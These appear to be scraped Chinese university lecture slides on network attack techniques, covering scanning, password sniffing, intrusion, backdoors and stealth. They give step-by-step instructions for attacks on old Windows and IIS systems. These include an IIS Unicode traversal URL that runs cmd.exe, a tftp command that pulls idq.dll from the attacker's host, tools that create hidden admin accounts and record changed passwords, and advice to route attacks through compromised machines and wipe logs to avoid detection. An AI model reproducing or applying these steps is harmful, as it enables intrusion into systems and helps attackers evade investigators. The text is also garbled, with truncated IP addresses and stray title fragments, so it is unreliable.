計算機(jī)網(wǎng)絡(luò)安全2詳解

計算機(jī)網(wǎng)絡(luò)安全等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書第二部分網(wǎng)絡(luò)安全攻擊技術(shù)等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書本部分包括4章內(nèi)容：★第4章網(wǎng)絡(luò)掃描與網(wǎng)絡(luò)監(jiān)聽★第5章網(wǎng)絡(luò)入侵★第6章網(wǎng)絡(luò)后門與網(wǎng)絡(luò)隱身★第7章惡意代碼第四章網(wǎng)絡(luò)掃描與網(wǎng)絡(luò)監(jiān)聽4等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書黑客概述等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

什么是黑客？黑客是“Hacker”的音譯，源于動詞Hack，其引申意義是指“干了一件非常漂亮的事”。這里說的黑客是指那些精于某方面技術(shù)的人。對于計算機(jī)而言，黑客就是精通網(wǎng)絡(luò)、系統(tǒng)、外設(shè)以及軟硬件技術(shù)的人。

什么是駭客？有些黑客逾越尺度，運用自己的知識去做出有損他人權(quán)益的事情，就稱這種人為駭客（Cracker，破壞者）。黑客分類目前將黑客的分成三類：第一類：破壞者；第二類：紅客；第三類：間諜等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書黑客守則等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

任何職業(yè)都有相關(guān)的職業(yè)道德，一名黑客同樣有職業(yè)道德，一些守則是必須遵守的，不讓會給自己招來麻煩。歸納起來就是“黑客十二條守則”。1、不要惡意破壞任何的系統(tǒng)，這樣做只會給你帶來麻煩。2、不要破壞別人的軟件和資料。3、不要修改任何系統(tǒng)文件，如果是因為進(jìn)入系統(tǒng)的需要而修改了系統(tǒng)文件，請在目的達(dá)到后將他改回原狀。4、不要輕易的將你要黑的或者黑過的站點告訴你不信任的朋友。5、在發(fā)表黑客文章時不要用你的真實名字。6、正在入侵的時候，不要隨意離開你的電腦。7、不要入侵或破壞政府機(jī)關(guān)的主機(jī)。8、將你的筆記放在安全的地方。9、已侵入的電腦中的賬號不得清除或修改。10、可以為隱藏自己的侵入而作一些修改，但要盡量保持原系統(tǒng)的安全性，不能因為得到系統(tǒng)的控制權(quán)而將門戶大開。11、不要做一些無聊、單調(diào)并且愚蠢的重復(fù)性工作。12、做真正的黑客，讀遍所有有關(guān)系統(tǒng)安全或系統(tǒng)漏洞的書。攻擊五部曲等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

一次成功的攻擊，都可以歸納成基本的五步驟，但是根據(jù)實際情況可以隨時調(diào)整。歸納起來就是“黑客攻擊五部曲”1、隱藏IP2、踩點掃描3、獲得系統(tǒng)或管理員權(quán)限4、種植后門5、在網(wǎng)絡(luò)中隱身1、隱藏IP等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

這一步必須做，因為如果自己的入侵的痕跡被發(fā)現(xiàn)了，當(dāng)

FBI找上門的時候就一切都晚了。通常有兩種方法實現(xiàn)自己IP的隱藏：

第一種方法是首先入侵互聯(lián)網(wǎng)上的一臺電腦（俗稱“肉雞”），利用這臺電腦進(jìn)行攻擊，這樣即使被發(fā)現(xiàn)了，也是“肉雞”的IP地址。

第二種方式是做多極跳板“Sock代理”，這樣在入侵的電腦上留下的是代理計算機(jī)的IP地址。

比如攻擊A國的站點，一般選擇離A國很遠(yuǎn)的B國計算機(jī)作為

“肉雞”或者“代理”，這樣跨國度的攻擊，一般很難被偵破。2、踩點掃描等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

踩點就是通過各種途徑對所要攻擊的目標(biāo)進(jìn)行多方面的了解（包括任何可得到的蛛絲馬跡，但要確保信息的準(zhǔn)確），確定攻擊的時間和地點。

掃描的目的是利用各種工具在攻擊目標(biāo)的IP地址或地址段的主機(jī)上尋找漏洞。掃描分成兩種策略：被動式策略和主動式策略。3、獲得系統(tǒng)或管理員權(quán)限等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

得到管理員權(quán)限的目的是連接到遠(yuǎn)程計算機(jī)，對其進(jìn)行控制，達(dá)到自己攻擊目的。獲得系統(tǒng)及管理員權(quán)限的方法有：通過系統(tǒng)漏洞獲得系統(tǒng)權(quán)限通過管理漏洞獲得管理員權(quán)限通過軟件漏洞得到系統(tǒng)權(quán)限通過監(jiān)聽獲得敏感信息進(jìn)一步獲得相應(yīng)權(quán)限通過弱口令獲得遠(yuǎn)程管理員的用戶密碼通過窮舉法獲得遠(yuǎn)程管理員的用戶密碼

通過攻破與目標(biāo)機(jī)有信任關(guān)系另一臺機(jī)器進(jìn)而得到目標(biāo)機(jī)的控制權(quán)通過欺騙獲得權(quán)限以及其他有效的方法。4、種植后門等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

為了保持長期對自己勝利果實的訪問權(quán),在已經(jīng)攻破的計算機(jī)上種植一些供自己訪問的后門。5、在網(wǎng)絡(luò)中隱身等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

一次成功入侵之后，一般在對方的計算機(jī)上已經(jīng)存儲了相關(guān)的登錄日志，這樣就容易被管理員發(fā)現(xiàn)。

在入侵完畢后需要清除登錄日志已經(jīng)其他相關(guān)的日志。攻擊和安全的關(guān)系等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

黑客攻擊和網(wǎng)絡(luò)安全的是緊密結(jié)合在一起的，研究網(wǎng)絡(luò)安全不研究黑客攻擊技術(shù)簡直是紙上談兵，研究攻擊技術(shù)不研究網(wǎng)絡(luò)安全就是閉門造車。

某種意義上說沒有攻擊就沒有安全，系統(tǒng)管理員可以利用常見的攻擊手段對系統(tǒng)進(jìn)行檢測，并對相關(guān)的漏洞采取措施。

網(wǎng)絡(luò)攻擊有善意也有惡意的，善意的攻擊可以幫助系統(tǒng)管理員檢查系統(tǒng)漏洞，惡意的攻擊可以包括：為了私人恩怨而攻擊、商業(yè)或個人目的獲得秘密資料、民族仇恨、利用對方的系統(tǒng)資源滿足自己的需求、尋求刺激、給別人幫忙以及一些無目的攻擊。網(wǎng)絡(luò)踩點等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

踩點就是通過各種途徑對所要攻擊的目標(biāo)進(jìn)行多方面的了解（包括任何可得到的蛛絲馬跡，但要確保信息的準(zhǔn)確）。常見的踩點方法包括：在域名及其注冊機(jī)構(gòu)的查詢公司性質(zhì)的了解對主頁進(jìn)行分析郵件地址的搜集目標(biāo)IP地址范圍查詢。

踩點的目的就是探察對方的各方面情況，確定攻擊的時機(jī)。模清除對方最薄弱的環(huán)節(jié)和守衛(wèi)最松散的時刻，為下一步的入侵提供良好的策略。網(wǎng)絡(luò)掃描等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

黑客攻擊五部曲中第二步踩點掃描中的掃描，一般分成兩種策略:一種是主動式策略另一種是被動式策略。網(wǎng)絡(luò)掃描概述等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

被動式策略就是基于主機(jī)之上，對系統(tǒng)中不合適的設(shè)置，脆弱的口令以及其他同安全規(guī)則抵觸的對象進(jìn)行

檢查。主動式策略是基于網(wǎng)絡(luò)的，它通過執(zhí)行一些腳

本文件模擬對系統(tǒng)進(jìn)行攻擊的行為并記錄系統(tǒng)的反應(yīng)，從而發(fā)現(xiàn)其中的漏洞。

掃描的目的就是利用各種工具對攻擊目標(biāo)的IP地址或地址段的主機(jī)查找漏洞。掃描采取模擬攻擊的形式對目標(biāo)可能存在的已知安全漏洞逐項進(jìn)行檢查，目標(biāo)可以是工作站、服務(wù)器、交換機(jī)、路由器和數(shù)據(jù)庫應(yīng)用等。根據(jù)掃描結(jié)果向掃描者或管理員提供周密可靠的分析報告。掃描方式等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書主動式掃描一般可以分成：

1、活動主機(jī)探測；2、ICMP查詢；3、網(wǎng)絡(luò)PING掃描；4、端口掃描；5、標(biāo)識UDP和TCP服務(wù)；6、指定漏洞掃描；7、綜合掃描。掃描方式可以分成兩大類：慢速掃描和亂序掃描。

1、慢速掃描：對非連續(xù)端口進(jìn)行掃描，并且源地址不一致、時間間隔長沒有規(guī)律的掃描。

2、亂序掃描：對連續(xù)的端口進(jìn)行掃描，源地址一致，時間間隔短的掃描。被動式策略掃描等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

被動式策略是基于主機(jī)之上，對系統(tǒng)中不合適的設(shè)置，脆弱的口令以及其他同安全規(guī)則抵觸的對象進(jìn)行檢查。

被動式掃描不會對系統(tǒng)造成破壞，而主動式掃描對系統(tǒng)進(jìn)行模擬攻擊，可能會對系統(tǒng)造成破壞。案例4-1系統(tǒng)用戶掃描可以使用工具軟件：GetNTUser，該工具可以在Winnt4以及Win2000操作系統(tǒng)上使用，主要功能包括：（1）掃描出NT主機(jī)上存在的用戶名。（2）自動猜測空密碼和與用戶名相同的密碼。（3）可以使用指定密碼字典猜測密碼。（4）可以使用指定字符來窮舉猜測密碼。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書案例4-2開放端口掃描

得到對方開放了哪些端口也是掃描的重要一步。使用工具軟件PortScan可以到得到對方計算機(jī)都開放了哪些端口，主界面如圖4-8所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書案例4-3共享目錄掃描

通過工具軟件Shed來掃描對方主機(jī)，得到對方計算機(jī)提供了哪些目錄共享。工具軟件的主界面如圖4-10所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書案例4-4利用TCP協(xié)議實現(xiàn)端口掃描等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

實現(xiàn)端口掃描的程序可以使用TCP協(xié)議和

UDP協(xié)議，原理是利用Socket連接對方的計算機(jī)的某端口，試圖和該端口建立連接

如果建立成功，就說明對方開放了該端口，如果失敗了，就說明對方?jīng)]有開放該端口。主動式策略掃描等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

主動式策略是基于網(wǎng)絡(luò)的，它通過執(zhí)行一些腳本文件模擬對系統(tǒng)進(jìn)行攻擊的行為并記錄系統(tǒng)的反應(yīng)，從而發(fā)現(xiàn)其中的漏洞。案例4-5漏洞掃描等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書使用工具軟件X-Scan-v2.3

該軟件的系統(tǒng)要求為：Windows

9x/NT4/2000。該軟件采

用多線程方式對指定IP地址段(（或單機(jī)）進(jìn)行安全漏洞檢測，支持插件功能，提供了圖形界面和命令行兩種操作方式掃描內(nèi)容包括：遠(yuǎn)程操作系統(tǒng)類型及版本標(biāo)準(zhǔn)端口狀態(tài)及端口Banner信息SNMP信息，CGI漏洞，IIS漏洞，RPC漏洞，SSL漏洞SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVERNT-SERVER弱口令用戶，NT服務(wù)器NETBIOS信息注冊表信息等。網(wǎng)絡(luò)監(jiān)聽等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

網(wǎng)絡(luò)監(jiān)聽的目的是截獲通信的內(nèi)容，監(jiān)聽的手段是對協(xié)議進(jìn)行分析。Sniffer

pro就是一個完善的網(wǎng)絡(luò)監(jiān)聽工具。

監(jiān)聽器Sniffer的原理：在局域網(wǎng)中與其他計算機(jī)進(jìn)行數(shù)據(jù)交換的時候，發(fā)送的數(shù)據(jù)包發(fā)往所有的連在一起的主機(jī)，也就是廣播，在報頭中包含目標(biāo)機(jī)的正確地址。因此只有與數(shù)據(jù)包中目標(biāo)地址一致的那臺主機(jī)才會接收數(shù)據(jù)包，其他的機(jī)器都會將包丟棄。但是，當(dāng)主機(jī)工作在監(jiān)聽模式下時，無論接收到的數(shù)據(jù)包中目標(biāo)地址是什么，主機(jī)都將其接收下來。然后對數(shù)據(jù)包進(jìn)行分析，就得到了局域網(wǎng)中通信的數(shù)據(jù)。一臺計算機(jī)可以監(jiān)聽同一網(wǎng)段所有的數(shù)據(jù)包，不能監(jiān)聽不同網(wǎng)段的計算機(jī)傳輸?shù)男畔?。監(jiān)聽軟件等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

防止監(jiān)聽的手段是：建設(shè)交換網(wǎng)絡(luò)、使用加密技術(shù)和使用一次性口令技術(shù)。

除了非常著名的監(jiān)聽軟件Sniffer

Pro以外，還有一些常用的監(jiān)聽軟件：嗅探經(jīng)典－－Iris密碼監(jiān)聽工具－－Win

Sniffer

密碼監(jiān)聽工具－－pswmonitor和非交換環(huán)境局域網(wǎng)的

fssniffer等等

Sniffer

Pro是一款非常著名監(jiān)聽的工具，但是Sniffer

Pro不能有效的提取有效的信息。監(jiān)聽工具-Win

Sniffer

Win

Sniffer專門用來截取局域網(wǎng)內(nèi)的密碼，比如登錄

FTP，登錄Email等的密碼。主界面如圖4-19所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書監(jiān)聽工具-pswmonitor監(jiān)聽器pswmonitor用于監(jiān)聽基于WEB的郵箱密碼、POP3收信密碼和FTP登錄密碼等等，只需在一臺電腦上運行，就可以監(jiān)聽局域網(wǎng)內(nèi)任意一臺電腦登錄的用戶名和密碼，并將密碼顯示、保存，或發(fā)送到用戶指定的郵箱，主界面如圖4-23所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書第五章網(wǎng)絡(luò)入侵5等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書社會工程學(xué)攻擊等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

社交工程是使用計謀和假情報去獲得密碼和其他敏感信息的科學(xué)，研究一個站點的策略其中之一就是盡可

能多的了解這個組織的個體，因此黑客不斷試圖尋找

更加精妙的方法從他們希望滲透的組織那里獲得信息。

目前社會工程學(xué)攻擊主要包括兩種方式：打電話請求密碼和偽造Email物理攻擊與防范等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

物理安全是保護(hù)一些比較重要的設(shè)備不被接觸。

物理安全比較難防，因為攻擊往往來自能夠接觸到物理設(shè)備的用戶。案例5-1得到管理員密碼

用戶登錄以后，所有的用戶信息都存儲在系統(tǒng)的一個進(jìn)程中，這個進(jìn)程是：“winlogon.exe”，可以利用程序?qū)?dāng)前登錄用戶的密碼解碼出來，如圖5-1所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書案例5-1得到管理員密碼

使用FindPass等工具可以對該進(jìn)程進(jìn)行解碼，然后將當(dāng)前用戶的密碼顯示出來。將FindPass.exe拷貝到C盤根目錄，執(zhí)行該程序，將得到當(dāng)前用戶得登錄名，如圖5-2所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書權(quán)限提升等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

有時候，管理員為了安全，給其他用戶建立一個普通用戶帳號，認(rèn)為這樣就安全了。

其實不然，用普通用戶帳號登錄后，可以利用工具GetAdmin.exe將自己加到管理員組或者新建一個具有管理員權(quán)限的用戶。案例5-2普通用戶建立管理員帳號

利用Hacker帳戶登錄系統(tǒng)，在系統(tǒng)中執(zhí)行程序

GetAdmin.exe，程序自動讀取所有用戶列表，在對話框中點擊按鈕“New”，在框中輸入要新建的管理員組的用戶名，如圖5-5所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書暴力攻擊等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

暴力攻擊的一個具體例子是，一個黑客試圖使用計算機(jī)和信息去破解一個密碼。

一個黑客需要破解—段單一的被用非對稱密鑰加密的信息，為了破解這種算法，一個黑客需要求助于非常精密復(fù)雜的方法，它使用120個工作站，兩個超級計算機(jī)利用從三個主要的研究中心獲得的信息，即使擁有這種配備，它也將花掉八天的時間去破解加密算法，實際上破解加密過程八天已是非常短暫的時間了。字典文件

一次字典攻擊能否成功，很大因素上決定與字典文件。一個好的字典文件可以高效快速的得到系統(tǒng)的密碼。攻擊不同的公司、不通地域的計算機(jī)，可以根據(jù)公司管理員的姓氏以及家人的生日，可以作為字典文件的一部分，公司以及部門的簡稱一般也可以作為字典文件的一部分，這樣可以大大的提高破解效率。

一個字典文件本身就是一個標(biāo)準(zhǔn)的文本文件，其中的每一行就代表一個可能的密碼。目前有很多工具軟件專門來創(chuàng)建字典文件，圖5-8是一個簡單的字典文件。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書暴力破解軟件密碼等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

目前許多軟件都具有加密的功能，比如Office文檔、Winzip文檔和Winrar文檔等等。這些文檔密碼可以有效的防止文檔被他人使用和閱讀。但是如果密碼位數(shù)不夠長的話，同樣容易被破解。案例5-5

Office文檔暴力破解修改權(quán)限密碼等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

在對話框中選擇選項卡“安全性”，在打開權(quán)限密碼和修改權(quán)限密碼的兩個文本框中都輸入

“999”，如圖5-12所示。輸入密碼

保存并關(guān)閉該文檔，然后再打開，就需要輸入密碼了，如圖5-13所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書破解Word文檔密碼

該密碼是三位的，使用工具軟件，Advanced

Office

XPPassword

Recovery可以快速破解Word文檔密碼，主

界面如圖5-14所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書Unicode漏洞專題等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

通過打操作系統(tǒng)的補(bǔ)丁程序，就可以消除漏洞。只要是針對漏洞進(jìn)行攻擊的案例都依賴于操作系統(tǒng)是否打了相關(guān)的補(bǔ)丁。Unicode漏洞是2000-10-17發(fā)布的，受影響的版本：Microsoft

IIS

5.0+Microsoft

Windows

2000系列版本Microsoft

IIS

4.0+

Microsoft

Windows

NT

4.0

消除該漏洞的方式是安裝操作系統(tǒng)的補(bǔ)丁，只要安裝了SP1以后，該漏洞就不存在了。微軟IIS4.0和5.0都存在利用擴(kuò)展UNICODE字符取代"/"和"\"而能利

用"../"目錄遍歷的漏洞。Unicode漏洞的檢測方法

使用掃描工具來檢測Unicode漏洞是否存在，使用上一章介紹的X-Scan來對目標(biāo)系統(tǒng)進(jìn)行掃描，目標(biāo)主機(jī)IP為：09，Unicode漏洞屬于IIS漏洞，所以這里只掃描IIS漏洞就可以了，X-Scan設(shè)置如圖5-17所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書Unicode漏洞的檢測方法可以看出，存在許多系統(tǒng)的漏洞。只要是/scripts開頭的漏洞都是

Unicode漏洞。比如：/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir其中/scripts目錄是IIS提供的可以執(zhí)行命令的一個有執(zhí)行程序權(quán)限的一個目錄，在IIS中的位置如圖5-19所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書利用Unicode漏洞入侵系統(tǒng)等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

在地址欄上執(zhí)行命令，用戶的權(quán)限比較低，像net等系統(tǒng)管理指令不能執(zhí)行。利用Unicode可以入侵對方的系統(tǒng)，并得到管理員權(quán)限。首先需要向?qū)Ψ椒?wù)器上傳

一些文件，入侵的第一步，建立tftp服務(wù)器，向?qū)Ψ降?/p>

scripts文件夾傳幾個文件。

需要上傳一個名為“idq.dll”的文件，為了上傳這個文件，首先在本地計算機(jī)上搭建一個TFTP服務(wù)器，普通文件傳輸協(xié)議TFTP（Text

File

Transmission

Protocol）一般用來傳輸單個文件。使用工具軟件tftpd32.exe建

立服務(wù)器。將idq.dll和tftpd32.exe放在本地的同一目錄下，執(zhí)行tftpd32.exe程序，主界面如圖5-26所示。利用Unicode漏洞入侵系統(tǒng)等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書利用Unicode漏洞入侵系統(tǒng)等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

這樣在本地的TFTP的服務(wù)器就建立好了，保留這個窗口，通過該服務(wù)器向?qū)Ψ絺鬟fidq.dll文件。在瀏覽器中執(zhí)行命令：

“09/scripts/..%c0%2f../winnt

system32/cmd.exe?/c+tftp+-i+10+get+idq.dll”，

命令其實是“tftp–i

10

get

idq.dll”思是從10服務(wù)器上獲取idq.dll文件，執(zhí)行成功的界面如圖5-27所示。上載文件等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書查看scripts目錄

上傳完畢后可以查看一下scripts目錄，是否真的上傳成功了。如圖5-28所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書入侵對方主機(jī)

說明已經(jīng)成功的在scripts目錄中上傳了一個idq.dll文件，下面使用工具軟件ispc.exe入侵對方系統(tǒng)。

拷貝ispc.exe文件到本地計算機(jī)的C盤根目錄，在DOS命令行下執(zhí)行命令：

“ispc.exe

09/scripts/idq.dll”，連接成功后就直接進(jìn)入了對方的DOS命令行下，而且具有管理員權(quán)限，入侵的過程5-29所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書建立用戶

可以在對方計算機(jī)上做管理員可以做的一切事情，比如添加用戶，建立一個用戶名為“Hacker123”，密碼也是“Hacker123”的用戶，如圖5-30所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書其他漏洞攻擊利用打印漏洞

利用打印漏洞可以在目標(biāo)的計算機(jī)上添加一個具有管理員權(quán)限的用戶。經(jīng)過測試，該漏洞在SP2、SP3以及SP4版本上依然存在，但是不能保證100%入侵成功。

使用工具軟件：cniis.exe，使用的語法格式是：

“cniis

09

0”，第一個參數(shù)是目標(biāo)的IP地址，第二參數(shù)是目標(biāo)操作系統(tǒng)的補(bǔ)丁號，因為

09沒有打補(bǔ)丁，這里就是0?？截?/p>

cniis.exe文件到C盤根目錄，執(zhí)行程序如圖5-31所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書SMB致命攻擊等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書SMB（Session

Message

Block，會話消息塊協(xié)議）又叫做

NetBIOS或LanManager協(xié)議，用于不同計算機(jī)之間文件、打印機(jī)、串口和通訊的共享和用于Windows平臺上提供磁盤和打印機(jī)的共享。SMB協(xié)議版本有很多種，在Windows

98、Windows

NT、Windows

2000和XP使用的是NTLM

0.12版本。利用該協(xié)議可以進(jìn)行各方面的攻擊，比如可以抓取其他用戶訪問自己計算機(jī)共享目錄的SMB會話包，然后利用SMB會話包登錄對方的計算機(jī)。下面介紹利用SMB協(xié)議讓對方操作系統(tǒng)系統(tǒng)重新啟動或者藍(lán)屏。致命攻擊

使用的工具軟件是：SMBDie

V1.0，該軟件對打了SP3、

SP4的計算機(jī)依然有效，必須打?qū)ｉT的SMB補(bǔ)丁，軟件的主界面如圖5-32所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書致命攻擊然后再點按鈕“Kill”，如果參數(shù)輸入沒有錯誤的話，對方計算機(jī)立刻重啟或藍(lán)屏，命中率幾乎100%，被攻擊的計算機(jī)藍(lán)屏界面如圖5-34所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書緩沖區(qū)溢出攻擊等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

目前最流行的一種攻擊技術(shù)就是緩沖區(qū)溢出攻擊。當(dāng)目標(biāo)操作系統(tǒng)收到了超過了它的最大能接收的信息量的時候，將發(fā)生緩沖區(qū)溢出。這些多余的數(shù)據(jù)將使程序的緩沖區(qū)溢出，然后覆蓋了實際的程序數(shù)據(jù)，緩沖區(qū)溢出使目標(biāo)系統(tǒng)的程序被修改，經(jīng)過這種修改的結(jié)果使在系統(tǒng)上產(chǎn)生一個后門。

這項攻擊對技術(shù)要求比較高，但是攻擊的過程卻非常簡單。緩沖區(qū)溢出原理很簡單，比如程序：緩沖區(qū)溢出攻擊等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書void

function(char

*

szPara1){■char

buff[16];strcpy(buffer,

szPara1);}

程序中利用strcpy函數(shù)將szPara1中的內(nèi)容拷貝到buff中，只要szPara1的長度大于16，就會造成緩沖區(qū)溢出。存在strcpy函數(shù)這樣問題的C語言函數(shù)還有：strcat()、gets()、scanf()等。RPC漏洞溢出

遠(yuǎn)程過程調(diào)用RPC（Remote

Procedure

Call)，是操作系統(tǒng)的一種消息傳遞功能，允許應(yīng)用程序呼叫網(wǎng)絡(luò)上的計算機(jī)。當(dāng)系統(tǒng)啟動的時候，自動加載RPC服務(wù)?？梢栽诜?wù)列表中看到系統(tǒng)的RPC服務(wù)，如圖5-35所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書利用RPC漏洞建立超級用戶等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

RPC溢出漏洞，對SP4也適用，必須打?qū)Ｓ醚a(bǔ)丁。利用工具scanms.exe文件檢測RPC漏洞，該工具是ISS安全公司2003年7月30日發(fā)布的，運行在命令行下用來檢測指定IP地址范圍內(nèi)機(jī)器是否已經(jīng)安裝了“DCOM

RPC接口遠(yuǎn)程緩沖區(qū)溢出漏洞（823980-MS03-026）”補(bǔ)丁程序。

如果沒有安裝補(bǔ)丁程序，該IP地址就會顯示出

“[VULN]”。首先拷貝該文件到C盤根目錄，現(xiàn)在要

檢查地址段09到10的主機(jī)，執(zhí)行命令“scanms.exe

09-10”，檢查過程如圖5-36所示。檢查緩沖區(qū)溢出漏洞等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書檢查緩沖區(qū)溢出漏洞等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

利用工具軟件attack.exe對09進(jìn)行攻擊。攻擊的結(jié)果將在對方計算機(jī)上建立一個具有管理員權(quán)限的用戶，并終止了對方的RPC服務(wù)。

新建用戶的用戶名和密碼都是qing10，這樣就可以登錄對方計算機(jī)了，RPC服務(wù)停止操作系統(tǒng)將有許多功能不能使用，非常容易被管理員發(fā)現(xiàn)，使用工具軟件OpenRpcSs.exe來給對方重啟RPC服務(wù)。利用IIS溢出進(jìn)行攻擊案例5-11利用IIS溢出入侵系統(tǒng)

利用軟件Snake

IIS溢出工具可以讓對方的IIS溢出，還可以捆綁執(zhí)行的命令和在對方計算機(jī)上開辟端口，工具軟件的主界面如圖5-38所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書利用WebDav遠(yuǎn)程溢出

需要使用工具軟件nc.exe和webdavx3.exe，首先在

DOS命令行下執(zhí)行webdavx3.exe，如果執(zhí)行的話，該程序?qū)⑻崾疽呀?jīng)過期了，如圖4-46所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書拒絕服務(wù)攻擊等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

拒絕服務(wù)攻擊的簡稱是：DoS（Denial

of

Service）攻擊，凡是造成目標(biāo)計算機(jī)拒絕提供服務(wù)的攻擊都稱為DoS攻擊，其目的是使目標(biāo)計算機(jī)或網(wǎng)絡(luò)無法提供正常的服務(wù)，比較著名的有SYN風(fēng)暴，Smurf攻擊和利用處理程序錯誤進(jìn)行攻擊。

最常見的DoS攻擊是：計算機(jī)網(wǎng)絡(luò)帶寬攻擊和連通性攻擊。帶寬攻擊是以極大的通信量沖擊網(wǎng)絡(luò)，使網(wǎng)絡(luò)所有可用的帶寬都被消耗掉，最后導(dǎo)致合法用戶的請求無法通過。連通性攻擊指用大量的連接請求沖擊計算機(jī)，最終導(dǎo)致計算機(jī)無法再處理合法用戶的請求。第六章網(wǎng)絡(luò)后門與網(wǎng)絡(luò)隱身6等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書網(wǎng)絡(luò)后門等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

網(wǎng)絡(luò)后門是保持對目標(biāo)主機(jī)長久控制的關(guān)鍵策略?？梢酝ㄟ^建立服務(wù)端口和克隆管理員帳號來實現(xiàn)。留后門的藝術(shù)

只要能不通過正常登錄進(jìn)入系統(tǒng)的途徑都稱之為網(wǎng)絡(luò)后門。后門的好壞取決于被管理員發(fā)現(xiàn)的概率。只要

是不容易被發(fā)現(xiàn)的后門都是好后門。留后門的原理和

選間諜是一樣的，讓管理員看了感覺沒有任何特別的。遠(yuǎn)程開啟對方的Telnet服務(wù)等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書利用工具RTCS.vbe可以遠(yuǎn)程開啟對方的Telnet服務(wù)，使用該工具需要知道對方具有管理員權(quán)限的用戶名和密碼。命令的語法是：“cscript

RTCS.vbe

09

administrator123456

1

23”，其中cscript是操作系統(tǒng)自帶的命令RTCS.vbe是該工具軟件腳本文件IP地址是要啟動Telnet的主機(jī)地址administrator是用戶名123456是密碼1是登錄系統(tǒng)的驗證方式23是Telnet開放的端口該命令根據(jù)網(wǎng)絡(luò)的速度，執(zhí)行的時候需要一段時間確認(rèn)對話框

執(zhí)行完成后，對方的Telnet服務(wù)就被開啟了。在DOS提示符下，登錄目標(biāo)主機(jī)的Telnet服務(wù)，首先輸入命令“Telnet09”，因為Telnet的用戶名和密碼是明文傳遞的，首先出現(xiàn)確認(rèn)發(fā)送信息對話框，如圖6-4所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書登錄Telnet的用戶名和密碼

輸入字符“y”，進(jìn)入Telnet的登錄界面，需要輸入主機(jī)的用戶名和密碼，如圖6-5所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書登錄Telnet服務(wù)器

如果用戶名和密碼沒有錯誤，將進(jìn)入對方主機(jī)的命令行，如圖6-6所示。等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書記錄管理員口令修改過程等學(xué)校計算機(jī)科學(xué)與技術(shù)叢書

當(dāng)入侵到對方主機(jī)并得到管理員口令以后，就可以對主機(jī)進(jìn)行長久入侵了，但是一個好的管理員一般每隔半個月左

右就會修改一次密碼，這樣已經(jīng)得到的密碼就不起作用了。

利用工具軟件Win2kPass.exe記錄修改的新密碼，該軟件將密碼記錄在Winnt\temp目錄下的Config.ini文件中，有時候文件名可能不是Config，但是擴(kuò)展名一定是ini，該工具軟件是有“自殺”的功能，就是當(dāng)執(zhí)行完畢后，自動刪除自

己。記錄管理員口令修改過程

